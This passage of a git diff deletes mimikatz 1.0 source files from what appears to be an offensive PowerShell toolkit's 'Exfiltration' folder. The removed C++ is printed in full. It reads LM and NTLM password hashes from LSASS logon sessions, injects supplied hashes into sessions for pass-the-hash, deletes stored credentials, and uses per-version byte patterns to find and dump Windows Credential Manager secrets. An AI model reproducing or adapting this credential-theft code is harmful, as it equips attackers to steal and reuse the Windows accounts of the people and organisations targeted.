\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/klock/klock.vcxproj.filters b/Exfiltration/mimikatz-1.0/librairies/klock/klock.vcxproj.filters deleted file mode 100644 index cc5f342..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/klock/klock.vcxproj.filters +++ /dev/null @@ -1,53 +0,0 @@ -<?xml version="1.0" encoding="utf-8"?> -<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <ItemGroup> - <Filter Include="Modules Communs"> - <UniqueIdentifier>{255a8a01-9f58-4a47-9d1e-1d5fc9f16419}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Communication"> - <UniqueIdentifier>{d6070dc8-7a9b-46c0-b75a-5fd6c10f8613}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Parseur"> - <UniqueIdentifier>{01639990-b135-46fe-8511-84761977c1bf}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\Librairie Modèle"> - <UniqueIdentifier>{fa3fed71-2d05-4e39-a46b-59e9b2c83e04}</UniqueIdentifier> - </Filter> - <Filter Include="Modules Communs\System"> - <UniqueIdentifier>{e53f7390-cd26-41d0-9f10-ea350fc88e43}</UniqueIdentifier> - </Filter> - </ItemGroup> - <ItemGroup> - <ClCompile Include="..\..\modules\mod_pipe.cpp"> - <Filter>Modules Communs\Communication</Filter> - </ClCompile> - <ClCompile Include="..\..\modules\mod_parseur.cpp"> - <Filter>Modules Communs\Parseur</Filter> - </ClCompile> - <ClCompile Include="..\..\commun\kmodel.cpp"> - <Filter>Modules Communs\Librairie Modèle</Filter> - </ClCompile> - <ClCompile Include="klock.cpp" /> - <ClCompile Include="..\..\modules\mod_system.cpp"> - <Filter>Modules Communs\System</Filter> - </ClCompile> - </ItemGroup> - <ItemGroup> - <ClInclude Include="..\..\modules\mod_pipe.h"> - <Filter>Modules Communs\Communication</Filter> - </ClInclude> - <ClInclude Include="..\..\modules\mod_parseur.h"> - <Filter>Modules Communs\Parseur</Filter> - </ClInclude> - <ClInclude Include="..\..\commun\kmodel.h"> - <Filter>Modules Communs\Librairie Modèle</Filter> - </ClInclude> - <ClInclude Include="klock.h" /> - <ClInclude Include="..\..\modules\mod_system.h"> - <Filter>Modules Communs\System</Filter> - </ClInclude> - </ItemGroup> - <ItemGroup> - <ResourceCompile Include="klock.rc" /> - </ItemGroup> -</Project>
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp deleted file mode 100644 index b429e5a..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.cpp +++ /dev/null @@ -1,153 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "msv1_0.h" - -bool searchMSVFuncs() -{ - if(!MSV1_0_MspAuthenticationPackageId) - MSV1_0_MspAuthenticationPackageId = (mod_system::GLOB_Version.dwBuildNumber < 7000) ? 2 : 3; - return (searchLSAFuncs() && (MSV1_0_MspAuthenticationPackageId != 0)); -} - -bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) -{ - wostringstream maReponse; - if(searchMSVFuncs()) - { - unsigned short reservedSize = 0; - PMSV1_0_PRIMARY_CREDENTIAL kiwiCreds = NULL; - if(NT_SUCCESS(NlpGetPrimaryCredential(logId, &kiwiCreds, &reservedSize))) - { - wstring lmHash = mod_text::stringOfHex(kiwiCreds->LmOwfPassword, sizeof(kiwiCreds->LmOwfPassword)); - wstring ntHash = mod_text::stringOfHex(kiwiCreds->NtOwfPassword, sizeof(kiwiCreds->NtOwfPassword)); - - if(justSecurity) - maReponse << L"lm{ " << lmHash << L" }, ntlm{ " << ntHash << L" }"; - else - { - maReponse << endl << - L"\t * Utilisateur : " << mod_text::stringOfSTRING(kiwiCreds->UserName) << endl << - L"\t * Domaine : " << mod_text::stringOfSTRING(kiwiCreds->LogonDomainName) << endl << - L"\t * Hash LM : " << lmHash << endl << - L"\t * Hash NTLM : " << ntHash; - } - SeckPkgFunctionTable->FreeLsaHeap(kiwiCreds); - } - else maReponse << L"n.t. (LUID KO)"; - } - else maReponse << L"n.a. (msv KO)"; - - return sendTo(monPipe, maReponse.str()); -} - -__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getMSVLogonData, wstring(L"msv1_0"))); - return getLogonData(monPipe, mesArguments, &monProvider); -} - -__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream maReponse; - if(searchMSVFuncs()) - { - if(!mesArguments->empty() && mesArguments->size() >= 1 && mesArguments->size() <= 2) - { - wstring idSecAppHigh = L"0"; - wstring idSecAppLow = mesArguments->front(); - if(mesArguments->size() > 1) - { - idSecAppHigh = mesArguments->front(); idSecAppLow = mesArguments->back(); - } - - LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); - if(idApp.LowPart != 0 || idApp.HighPart != 0) - maReponse << (NT_SUCCESS(NlpDeletePrimaryCredential(&idApp)) ? L"Suppression des donnes de scurit russie :)" : L"Suppression des donnes de scurit en chec :("); - else maReponse << L"LUID incorrect !"; - } - else maReponse << L"Format d\'appel invalide : delLogonSession [idSecAppHigh] idSecAppLow"; - } - else maReponse << L"n.a. (msv KO)"; - - maReponse << endl; - return sendTo(monPipe, maReponse.str()); -} - -__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream maReponse; - if(searchMSVFuncs()) - { - if(!mesArguments->empty() && mesArguments->size() >= 4 && mesArguments->size() <= 6) - { - MSV1_0_PRIMARY_CREDENTIAL kiwicreds; - RtlZeroMemory(&kiwicreds, sizeof(MSV1_0_PRIMARY_CREDENTIAL)); - - wstring idSecAppHigh = L"0", idSecAppLow, userName, domainName, lmHash, ntlmHash = mesArguments->back(); - kiwicreds.LmPasswordPresent = FALSE; - kiwicreds.NtPasswordPresent = TRUE; - - switch(mesArguments->size()) // mchants arguments utilisateurs - { - case 4: - idSecAppLow = mesArguments->front(); - userName = mesArguments->at(1); - domainName = mesArguments->at(2); - break; - case 6: - idSecAppHigh = mesArguments->front(); - idSecAppLow = mesArguments->at(1); - userName = mesArguments->at(2); - domainName = mesArguments->at(3); - kiwicreds.LmPasswordPresent = TRUE; - lmHash = mesArguments->at(4); - break; - case 5: - if(mesArguments->at(3).size() == 0x20) - { - idSecAppLow = mesArguments->front(); - userName = mesArguments->at(1); - domainName = mesArguments->at(2); - kiwicreds.LmPasswordPresent = TRUE; - lmHash = mesArguments->at(3); - } - else - { - idSecAppHigh = mesArguments->front(); - idSecAppLow = mesArguments->at(1); - userName = mesArguments->at(2); - domainName = mesArguments->at(3); - } - break; - } - - LUID idApp = mod_text::wstringsToLUID(idSecAppHigh, idSecAppLow); - - if(idApp.LowPart != 0 || idApp.HighPart != 0) - { - if((!kiwicreds.LmPasswordPresent || (lmHash.size() == 0x20)) && ntlmHash.size() == 0x20 && userName.size() <= MAX_USERNAME_LEN && domainName.size() <= MAX_DOMAIN_LEN) - { - mod_text::InitLsaStringToBuffer(&kiwicreds.UserName, userName, kiwicreds.BuffUserName); - mod_text::InitLsaStringToBuffer(&kiwicreds.LogonDomainName, domainName, kiwicreds.BuffDomaine); - if(kiwicreds.LmPasswordPresent) - mod_text::wstringHexToByte(lmHash, kiwicreds.LmOwfPassword); - mod_text::wstringHexToByte(ntlmHash, kiwicreds.NtOwfPassword); - - maReponse << (NT_SUCCESS(NlpAddPrimaryCredential(&idApp, &kiwicreds, sizeof(kiwicreds))) ? L"Injection de donnes de scurit russie :)" : L"Injection de donnes de scurit en chec :("); - } - else maReponse << L"Les hashs LM et NTLM doivent faire 32 caractres, le nom d\'utilisateur et le domaine/poste au maximum 22 caractres"; - } - else maReponse << L"LUID incorrect !"; - } - else maReponse << L"Format d\'appel invalide : addLogonSession [idSecAppHigh] idSecAppLow Utilisateur {Domaine|Poste} [HashLM] HashNTLM"; - } - else maReponse << L"n.a. (msv KO)"; - - maReponse << endl; - return sendTo(monPipe, maReponse.str()); -} diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h deleted file mode 100644 index 4749573..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0.h +++ /dev/null @@ -1,16 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../sekurlsa.h" -#include "msv1_0_helper.h" - -bool searchMSVFuncs(); -bool WINAPI getMSVLogonData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity); - -__kextdll bool __cdecl getLogonSessions(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl delLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments); -__kextdll bool __cdecl addLogonSession(mod_pipe * monPipe, vector<wstring> * mesArguments); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp deleted file mode 100644 index 7ccb8e5..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.cpp +++ /dev/null @@ -1,53 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "msv1_0_helper.h" -DWORD MSV1_0_MspAuthenticationPackageId = 0; - -void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative) -{ - if(String->Buffer) - String->Buffer = reinterpret_cast<wchar_t *>(reinterpret_cast<ULONG_PTR>(String->Buffer) + ((relative ? -1 : 1) * reinterpret_cast<ULONG_PTR>(BaseAddress))); -} - -NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize) -{ - STRING PrimaryKeyValue, CredentialString; - mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); - - NlpMakeRelativeOrAbsoluteString(Credential, &Credential->UserName); - NlpMakeRelativeOrAbsoluteString(Credential, &Credential->LogonDomainName); - CredentialString.Buffer = reinterpret_cast<char *>(Credential); - CredentialString.MaximumLength = CredentialString.Length = CredentialSize; - SeckPkgFunctionTable->LsaProtectMemory(CredentialString.Buffer, CredentialString.Length); - return SeckPkgFunctionTable->AddCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue, &CredentialString ); -} - -NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize) -{ - ULONG QueryContext = 0, PrimaryKeyLength; - STRING PrimaryKeyValue, CredentialString; - mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); - - NTSTATUS retour = SeckPkgFunctionTable->GetCredentials(LogonId, MSV1_0_MspAuthenticationPackageId, &QueryContext, FALSE, &PrimaryKeyValue, &PrimaryKeyLength, &CredentialString); - if(NT_SUCCESS(retour)) - { - SeckPkgFunctionTable->LsaUnprotectMemory(CredentialString.Buffer, CredentialString.Length); - *Credential = (PMSV1_0_PRIMARY_CREDENTIAL) CredentialString.Buffer; - NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->UserName), false); - NlpMakeRelativeOrAbsoluteString(*Credential, &((*Credential)->LogonDomainName), false); - if (CredentialSize) - *CredentialSize = CredentialString.Length; - } - return retour; -} - -NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId) -{ - STRING PrimaryKeyValue; - mod_text::RtlInitString(&PrimaryKeyValue, MSV1_0_PRIMARY_KEY); - return SeckPkgFunctionTable->DeleteCredential(LogonId, MSV1_0_MspAuthenticationPackageId, &PrimaryKeyValue); -}
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h deleted file mode 100644 index e9afd03..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Security Packages/msv1_0_helper.h +++ /dev/null @@ -1,28 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#pragma once -#include "../sekurlsa.h" - -#define MSV1_0_PRIMARY_KEY "Primary" -extern DWORD MSV1_0_MspAuthenticationPackageId; - -typedef struct _MSV1_0_PRIMARY_CREDENTIAL { - LSA_UNICODE_STRING LogonDomainName; - LSA_UNICODE_STRING UserName; - BYTE NtOwfPassword[0x10]; - BYTE LmOwfPassword[0x10]; - BOOLEAN NtPasswordPresent; - BOOLEAN LmPasswordPresent; - wchar_t BuffDomaine[MAX_DOMAIN_LEN]; - wchar_t BuffUserName[MAX_USERNAME_LEN]; -} MSV1_0_PRIMARY_CREDENTIAL, *PMSV1_0_PRIMARY_CREDENTIAL; - -void NlpMakeRelativeOrAbsoluteString(PVOID BaseAddress, PLSA_UNICODE_STRING String, bool relative = true); - -NTSTATUS NlpAddPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL Credential, unsigned short CredentialSize); -NTSTATUS NlpGetPrimaryCredential(PLUID LogonId, PMSV1_0_PRIMARY_CREDENTIAL *Credential, unsigned short *CredentialSize); -NTSTATUS NlpDeletePrimaryCredential(PLUID LogonId); diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog Binary files differdeleted file mode 100644 index af1843d..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog Binary files differdeleted file mode 100644 index 065c191..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/CL.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog Binary files differdeleted file mode 100644 index 662e27d..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/cl.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.read.1.tlog +++ /dev/null @@ -1 +0,0 @@ -
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog deleted file mode 100644 index 46b134b..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link-cvtres.write.1.tlog +++ /dev/null @@ -1 +0,0 @@ -
\ No newline at end of file diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog Binary files differdeleted file mode 100644 index 8bfc485..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog Binary files differdeleted file mode 100644 index a090f02..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog Binary files differdeleted file mode 100644 index 3c62e5a..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/link.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog Binary files differdeleted file mode 100644 index a61d64e..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog Binary files differdeleted file mode 100644 index c2411f0..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog Binary files differdeleted file mode 100644 index 0c67d61..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/mt.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog Binary files differdeleted file mode 100644 index 52d7b3d..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.command.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog Binary files differdeleted file mode 100644 index 465eb7a..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.read.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog Binary files differdeleted file mode 100644 index 9befde9..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/rc.write.1.tlog +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest deleted file mode 100644 index ecea6f7..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.dll.intermediate.manifest +++ /dev/null @@ -1,10 +0,0 @@ -<?xml version='1.0' encoding='UTF-8' standalone='yes'?> -<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'> - <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3"> - <security> - <requestedPrivileges> - <requestedExecutionLevel level='asInvoker' uiAccess='false' /> - </requestedPrivileges> - </security> - </trustInfo> -</assembly> diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate deleted file mode 100644 index 4d28193..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.lastbuildstate +++ /dev/null @@ -1,2 +0,0 @@ -#v4.0:v100 -Release|Win32|C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\| diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res Binary files differdeleted file mode 100644 index d0ba1dd..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.res +++ /dev/null diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog deleted file mode 100644 index 929c472..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/Win32/sekurlsa.write.1.tlog +++ /dev/null @@ -1,5 +0,0 @@ -^C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\librairies\sekurlsa\sekurlsa.vcxproj -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.lib -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.exp -C:\Github\PowerShellExperimental\Invoke-Mimikatz\mimikatz-1.0\Win32\sekurlsa.exp diff --git a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp b/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp deleted file mode 100644 index fe846b4..0000000 --- a/Exfiltration/mimikatz-1.0/librairies/sekurlsa/modules/credman.cpp +++ /dev/null @@ -1,180 +0,0 @@ -/* Benjamin DELPY `gentilkiwi` - http://blog.gentilkiwi.com - benjamin@gentilkiwi.com - Licence : http://creativecommons.org/licenses/by/3.0/fr/ - Ce fichier : http://creativecommons.org/licenses/by/3.0/fr/ -*/ -#include "credman.h" - -PCRED_I_ENUMERATE CredIEnumerate = NULL; - -bool searchCredmanFuncs() -{ -#ifdef _M_X64 - BYTE PTRN_WIN5_CrediEnumerate[] = {0x48, 0x8b, 0xc4, 0x48, 0x81, 0xec, 0xb8, 0x00, 0x00, 0x00, 0x48, 0x89, 0x70, 0xe8, 0x48, 0x89, 0x78, 0xe0, 0x4c, 0x89, 0x60, 0xd8, 0x45, 0x33, 0xe4}; - LONG OFFS_WIN5_CrediEnumerate = 0; - BYTE PTRN_WNO8_CrediEnumerate[] = {0x48, 0x81, 0xec, 0xd0, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xed}; - LONG OFFS_WNO8_CrediEnumerate = -22; - BYTE PTRN_WIN8_CrediEnumerate[] = {0x48, 0x81, 0xec, 0xe0, 0x00, 0x00, 0x00, 0x33, 0xc0, 0x45, 0x33, 0xed}; - LONG OFFS_WIN8_CrediEnumerate = -30; -#elif defined _M_IX86 - BYTE PTRN_WIN5_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x24, 0x53, 0x33, 0xdb, 0x57, 0x33, 0xc0}; - BYTE PTRN_WN60_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x40, 0x33, 0xc9}; - BYTE PTRN_WN61_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x83, 0xec, 0x44, 0x33, 0xc0}; - BYTE PTRN_WN62_CrediEnumerate[] = {0x8b, 0xff, 0x55, 0x8b, 0xec, 0x81, 0xec, 0x80, 0x00, 0x00, 0x00, 0x33, 0xc0}; - LONG OFFS_WALL_CrediEnumerate = 0; -#endif - - if(!CredIEnumerate) - { - PBYTE pattern = NULL; ULONG taille = 0; LONG offset = 0; -#ifdef _M_X64 - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pattern = PTRN_WIN5_CrediEnumerate; - taille = sizeof(PTRN_WIN5_CrediEnumerate); - offset = OFFS_WIN5_CrediEnumerate; - } - else - { - if (mod_system::GLOB_Version.dwMinorVersion < 2) - { - pattern = PTRN_WNO8_CrediEnumerate; - taille = sizeof(PTRN_WNO8_CrediEnumerate); - offset = OFFS_WNO8_CrediEnumerate; - } - else - { - pattern = PTRN_WIN8_CrediEnumerate; - taille = sizeof(PTRN_WIN8_CrediEnumerate); - offset = OFFS_WIN8_CrediEnumerate; - } - } -#elif defined _M_IX86 - if(mod_system::GLOB_Version.dwMajorVersion < 6) - { - pattern = PTRN_WIN5_CrediEnumerate; - taille = sizeof(PTRN_WIN5_CrediEnumerate); - } - else - { - if(mod_system::GLOB_Version.dwMinorVersion < 1) - { - pattern = PTRN_WN60_CrediEnumerate; - taille = sizeof(PTRN_WN60_CrediEnumerate); - } - else if (mod_system::GLOB_Version.dwMinorVersion < 2) - { - pattern = PTRN_WN61_CrediEnumerate; - taille = sizeof(PTRN_WN61_CrediEnumerate); - } - else - { - pattern = PTRN_WN62_CrediEnumerate; - taille = sizeof(PTRN_WN62_CrediEnumerate); - } - } - offset = OFFS_WALL_CrediEnumerate; -#endif - mod_memory::genericPatternSearch(reinterpret_cast<PBYTE *>(&CredIEnumerate), L"lsasrv", pattern, taille, offset, NULL, true, true); - } - return (searchLSAFuncs() && CredIEnumerate); -} - -__kextdll bool __cdecl getCredmanFunctions(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - wostringstream monStream; - monStream << L"** lsasrv.dll ** ; Statut recherche : " << (searchCredmanFuncs() ? L"OK :)" : L"KO :(") << endl << endl << - L"@CredIEnumerate = " << CredIEnumerate << endl << - L"@LsaUnprotectMemory = " << SeckPkgFunctionTable->LsaUnprotectMemory << endl; - return sendTo(monPipe, monStream.str()); -} - -__kextdll bool __cdecl getCredman(mod_pipe * monPipe, vector<wstring> * mesArguments) -{ - vector<pair<PFN_ENUM_BY_LUID, wstring>> monProvider; - monProvider.push_back(make_pair<PFN_ENUM_BY_LUID, wstring>(getCredmanData, wstring(L"credman"))); - return getLogonData(monPipe, mesArguments, &monProvider); -} - -bool WINAPI getCredmanData(__in PLUID logId, __in mod_pipe * monPipe, __in bool justSecurity) -{ - wostringstream message; - if(searchCredmanFuncs()) - { - DWORD credNb = 0; - PCREDENTIAL * pCredential = NULL; - DWORD CredIEnumerateFlags = (mod_system::GLOB_Version.dwMajorVersion < 6) ? 0 : CRED_ENUMERATE_ALL_CREDENTIALS; - NTSTATUS status = (mod_system::GLOB_Version.dwBuildNumber < 8000 ) ? CredIEnumerate(logId, 0, NULL, CredIEnumerateFlags, &credNb, &pCredential) : reinterpret_cast<PCRED_I_ENUMERATE62>(CredIEnumerate)(logId, NULL, CredIEnumerateFlags, &credNb, &pCredential); - - if(NT_SUCCESS(status)) - { - for(DWORD i = 0; i < credNb; i++) - { - wstring Target(pCredential[i]->TargetName); - wstring ShortTarget = (mod_system::GLOB_Version.dwMajorVersion < 6) ? Target : Target.substr(Target.find_first_of(L'=') + 1); - - message << endl; - if(justSecurity) - message << L"\t [" << i << L"] " << Target << L'\t'; - else message << - L"\t * [" << i << L"] Target : " << Target << L" / " << (pCredential[i]->TargetAlias ? pCredential[i]->TargetAlias : L"<NULL>") << endl << - L"\t * [" << i << L"] Comment : " << (pCredential[i]->Comment ? pCredential[i]->Comment : L"<NULL>") << endl << - L"\t * [" << i << L"] User : " << (pCredential[i]->UserName ? pCredential[i]->UserName : L"<NULL>") << endl; - - if((pCredential[i]->Type != CRED_TYPE_GENERIC) && (pCredential[i]->Type != CRED_TYPE_GENERIC_CERTIFICATE)) - { - CREDENTIAL_TARGET_INFORMATION mesInfos = {const_cast<wchar_t *>(ShortTarget.c_str()), NULL, NULL, NULL, NULL, NULL, NULL, pCredential[i]->Flags, 0 , NULL}; - DWORD dwNbCredentials; - PENCRYPTED_CREDENTIALW * pEncryptedCredential; - NTSTATUS status = SeckPkgFunctionTable->CrediReadDomainCredentials(logId, CREDP_FLAGS_IN_PROCESS, &mesInfos, 0, &dwNbCredentials, &pEncryptedCredential); - if(status == STATUS_INVALID_PARAMETER) - { - mesInfos.Flags |= CRED_TI_USERNAME_TARGET; - status = SeckPkgFunctionTable->CrediReadDomainCredentials(logId, CREDP_FLAGS_IN_PROCESS, &mesInfos, 0, &dwNbCredentials, &pEncryptedCredential); - } - if(NT_SUCCESS(status)) - { - for(DWORD j = 0; j < dwNbCredentials ; j++) - { - wostringstream prefix; prefix << L"[" << j << L"] "; - message << descEncryptedCredential(pEncryptedCredential[j], justSecurity, prefix.str()); - } - SeckPkgFunctionTable->CrediFreeCredentials(dwNbCredentials, pEncryptedCredential); - } - else message << L"Erreur CrediReadDomainCredentials : " << mod_system::getWinError(false, status); - } - else - { - PENCRYPTED_CREDENTIALW pEncryptedCredential; - NTSTATUS status = SeckPkgFunctionTable->CrediRead(logId, CREDP_FLAGS_IN_PROCESS, const_cast<wchar_t *>(ShortTarget.c_str()), pCredential[i]->Type, 0, &pEncryptedCredential); - if(NT_SUCCESS(status)) - { - message << descEncryptedCredential(pEncryptedCredential, justSecurity); - CredFree(pEncryptedCredential); - } - else message << L"Erreur CrediRead : " << mod_system::getWinError(false, status); - } - } - CredFree(pCredential); - } - else message << L"CredIEnumerate KO : " << mod_system::getWinError(false, status); - } else message << L"n.a. 